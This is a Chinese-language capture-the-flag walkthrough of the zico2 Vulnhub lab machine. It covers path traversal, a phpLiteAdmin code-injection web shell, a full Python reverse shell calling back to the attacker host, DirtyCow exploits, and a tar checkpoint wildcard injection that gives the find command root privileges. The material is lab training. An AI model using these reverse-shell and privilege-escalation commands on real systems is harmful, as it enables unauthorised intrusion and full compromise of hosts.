靶机介绍
官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/
目标是获取root的目录下的flag,难度是中级
运行环境:
靶机:网络设为NAT模式,IP地址为:192.168.174.133
攻击机:同网段下的kali Linux,IP地址为:192.168.174.128
运行靶机
开始渗透
获取IP地址
扫描端口
访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含
使用工具扫描发现确实存在目录遍历的漏洞,并且已经给出了攻击细节
成功包含passwd文件
扫一下目录
在dbadmin目录访问test_db.php发现是一个phpliteadmin管理系统,并且使用弱密码admin登录成功
phpliteadmin <=1.9.3版本是存在远程php代码执行漏洞
参考链接:https://www.exploit-db.com/exploits/24044
创建一个cmd.php数据库
在cmd.php数据库里面创建任意一张表
内容写成一句话,由于对单引号做了过滤所以一句话里面不要加单引号
返回view.php包含cmd.php
使用pyhton来反弹shell,需要将代码使用URL编码
源码:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.174.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
使用URL编码之后:python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.174.128%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B'
开启监听,执行代码
监听成功,使用python打开终端
再zico的家目录下找到了wordpress框架,并且再wordpress的配置文件当中找到了zico用户的密码
切换到zico用户
接下来就是提权到root了,提权的方法有很多
第一个方法使用sudo -l查看zico用户在tar和zip的用户组里面
使用工具查看zip的提权命令
也可以参考:https://www.freebuf.com/articles/system/206007.html
成功提权到root
使用工具查看tar的提权命令
成功提权到root
使用脚本来提权
参考链接:https://www.exploit-db.com/download/33589
使用33589脚本提权,可能是靶机与物理机的CPU不兼容所有会出现报错
换成dirty脚本就可以成功提权
下载地址:https://github.com/FireFart/dirtycow
由于靶机不能使用gcc所以使用kali攻击机将脚本编译
开始临时的HTTP服务将编译好的exp下载到靶机tmp目录下 因为在tmp目录下zico用户权限较高
赋予exp一个可执行的权限,将exp执行 jianhao是密码是可以更改的随便什么都可以不能为空
切换到xjh用户,可以看到xjh用户拥有root权限,切换root目录,成功找到flag
还有一种方法可以是使用find提权,有些麻烦其中也用到了tar
参考:https://hackingresources.com/zico2-vulnhub-walkthrough/
某位大神的笔记
find提权 (其实这里也是使用了tar进行执行提权,然后转到find,重点是find执行命令提权)
查看是否存在find命令setuid执行权限
find / -perm -4000 2>/dev/null | grep find
通过tar命令创建find命令具备setuid执行权限
cd /tmp
echo "chmod u+s /usr/bin/find" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
sudo tar cf archive.tar *
创建完成确认find命令是否成功被赋予setuid权限
find / -perm -4000 2>/dev/null | grep find
执行find命令开始提权
find /tmp -exec sh -i \;
重点解释下:
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
上述两条命令是为了创建两个文件,方便通过tar命令将此文件当做命令去执行,需要理解这个即可,执行成功之后,文件创建如下图:
图片链接:https://img-blog.csdnimg.cn/20210227222330729.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3hpbmdqaW5oYW8xMjM=,size_16,color_FFFFFF,t_70#pic_center
或者:https://img2020.cnblogs.com/blog/700440/202010/700440-20201016120648567-128586423.png
zico2这个靶机到这里就结束了,提权的方法有很多,你喜欢哪一种可以私信剑豪一起讨论!